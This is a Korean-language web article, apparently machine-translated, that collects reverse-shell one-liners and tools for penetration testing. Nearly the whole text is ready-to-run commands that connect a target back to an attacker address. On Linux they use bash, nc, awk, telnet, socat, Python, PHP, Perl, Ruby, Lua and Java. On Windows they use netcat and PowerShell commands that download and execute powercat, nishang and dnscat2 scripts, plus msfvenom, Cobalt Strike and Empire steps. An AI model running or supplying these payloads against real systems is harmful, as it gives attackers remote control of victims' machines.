셸 을 튕 기 는 몇 가지 자세 소결

6260 단어 반등shell
침투 과정 에서 포트 제한 으로 인해 목표 기 계 를 직접 연결 할 수 없 는 경우 가 많 습 니 다.이 때 는 셸 을 튕 겨 서 상호작용 셸 을 얻어 서 계속 깊이 들 어가 도록 해 야 합 니 다.
셸 을 되 돌 리 는 것 은 네트워크 채널 을 여 는 첫 번 째 단계 이자 권한 향상 과정 에서 중요 한 단계 입 니 다.모든 자 세 는 네트워크 에서 정 리 됩 니 다.만약 에 공격 자 호스트 는 192.168.9.9.242 이 고 현지 감청 1234 포트 입 니 다.특별한 상황 이 있 으 면 다음 과 같이 설명 하 겠 습 니 다.
리 눅 스 반등 셸
자세 1:bash 바 운 드

bash -i >& /dev/tcp/192.168.99.242/1234 0>&1

base64 :bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljk5LjI0Mi8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}'

온라인 인 코딩 주소:http://www.jackson-t.ca/runtime-exec-payloads.html
다른 버 전:

exec 5<>/dev/tcp/192.168.99.242/1234;cat <&5 | while read line; do $line 2>&5 >&5;done
exec /bin/sh 0</dev/tcp/192.168.99.242/1234 1>&0 2>&0
자세 2:nc 바 운 드

nc -e /bin/bash 192.168.99.242 1234
자세 3:awk 바 운 드

awk 'BEGIN{s="/inet/tcp/0/192.168.99.242/1234";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'
자세 4:telnet 바 운 드
비고:공격 호스트 에서 각각 1234 포트 와 4321 포트 를 감청 하고 셸 명령 을 실행 한 후 1234 터미널 에서 명령 을 입력 하고 4321 명령 이 실 행 된 결 과 를 확인 해 야 합 니 다.

telnet 192.168.99.242 1234 | /bin/bash | telnet 192.168.99.242 4321
자세 5:socat 튕 김

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.99.242:1234
자세 6:파 이 썬 바 운 드

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.99.242',1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
자세 7:PHP 바 운 드

php -r '$sock=fsockopen("192.168.99.242",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
자세 8:펄 바 운 드

perl -e 'use Socket;$i="192.168.99.242";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
자세 9:루비 바 운 드

ruby -rsocket -e'f=TCPSocket.open("192.168.99.242",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
자세 10:루 아 바 운 드

lua -e "require('socket');require('os');t=socket.tcp();t:connect('192.168.99.242','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
자세 11:자바 바 운 드

public class Revs {
    /**
    * @param args
    * @throws Exception 
    */
public static void main(String[] args) throws Exception {
        // TODO Auto-generated method stub
        Runtime r = Runtime.getRuntime();
        String cmd[]= {"/bin/bash","-c","exec 5<>/dev/tcp/192.168.99.242/1234;cat <&5 | while read line; do $line 2>&5 >&5; done"};
        Process p = r.exec(cmd);
        p.waitFor();
    }
}
Revs.java 파일 로 저장 하고 컴 파일 을 실행 하 며 셸 을 되 돌 리 는 데 성 공 했 습 니 다.

javac Revs.java 
java Revs
 윈도우 바 운 드 셸
자세 1:nc 바 운 드
netcat 다운로드:https://eternallybored.org/misc/netcat/
서버 바 운 드:nc 192.168.99.242 1234-e c:\windows\system 32\cmd.exe
자세 2:powershell 바 운 드
powercat 는 netcat 의 powershell 버 전 으로 netcat 보다 기능 면 살 성 이 훨씬 좋 습 니 다.

PS C:\WWW>powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 192.168.99.242 -p 1234 -e cmd
대상 기기 로 컬 에 다운로드 하여 실행:

PS C:\WWW> Import-Module ./powercat.ps1PS C:\WWW> powercat -c 192.168.99.242 -p 1234 -e cmd
자세 3:MSF 튕 김 셸
msfvenom 을 사용 하여 관련 Payload 생 성

msfvenom -l payloads | grep 'cmd/windows/reverse'
msfvenom -p cmd/windows/reverse_powershell LHOST=192.168.99.242 LPORT=1234
자세 4:Cobalt strike 바 운 드 셸
1.모니터 설정:Cobalt Strike―>Listeners―>아래 Tab 메뉴 Listeners 를 클릭 하고 add 를 클릭 합 니 다.
2.payload 생 성:Attacks―>Packages―>Windows Executable 을 클릭 하여 파일 위 치 를 저장 합 니 다.
3,대상 기 실행 powershell payload
자세 5:엠 파이 어 바 운 드 셸

usestager windows/launcher_vbs
info
set Listener test
execute
자세 6:nishang 바 운 드 셸
Reverse TCP shell:

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com /samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress 10.1.1.210 -port 1234
Reverse UDP shell:

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellUdp.ps1');Invoke-PowerShellUdp -Reverse -IPAddress 10.1.1.210 -port 1234
자세 7:Dnscat 튕 김 셸
github 프로젝트 주소:
https://github.com/iagox86/dnscat2
서버:

ruby dnscat2.rb --dns "domain=lltest.com,host=xx.xx.xx.xx" --no-cache -e open -e open 
대상 호스트:

powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/master/dnscat2.ps1');Start-Dnscat2 -Domain lltest.com -DNSServer xx.xx.xx.xx
여기 서 반등 셸 의 몇 가지 자세 소결 에 관 한 글 은 여기까지 소개 되 었 습 니 다.더 많은 반등 셸 내용 은 우리 의 이전 글 을 검색 하거나 아래 의 관련 글 을 계속 조회 하 시기 바 랍 니 다.앞으로 많은 응원 바 랍 니 다!

좋은 웹페이지 즐겨찾기